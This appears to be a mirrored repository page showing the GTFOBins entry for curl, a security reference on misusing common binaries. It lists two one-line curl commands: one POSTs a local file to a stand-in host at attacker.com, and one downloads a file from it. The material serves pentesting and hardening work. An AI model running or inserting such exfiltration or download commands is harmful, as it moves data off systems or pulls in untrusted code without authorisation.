This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-07 20:25:02 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
9af7c514a629c2d4bdf1d3ed41b8d3272ea8495c
GTFOBins.github.io
/
_gtfobins
/
curl.md
Andrea Cardaci
f0d72ff530
Fix trailing spaces
2018-05-25 01:10:39 +02:00
396 B
Raw
Blame
History
functions
functions
upload
download
description
code
Send local file with an HTTP POST request.
URL=
http://attacker.com/
LFILE=file_to_send curl -X POST -d @$file_to_send $URL
description
code
Fetch a remote file via HTTP GET request.
URL=
http://attacker.com/file_to_get
LFILE=where_to_save curl $URL -o $LFILE
Reference in New Issue
View Git Blame
Copy Permalink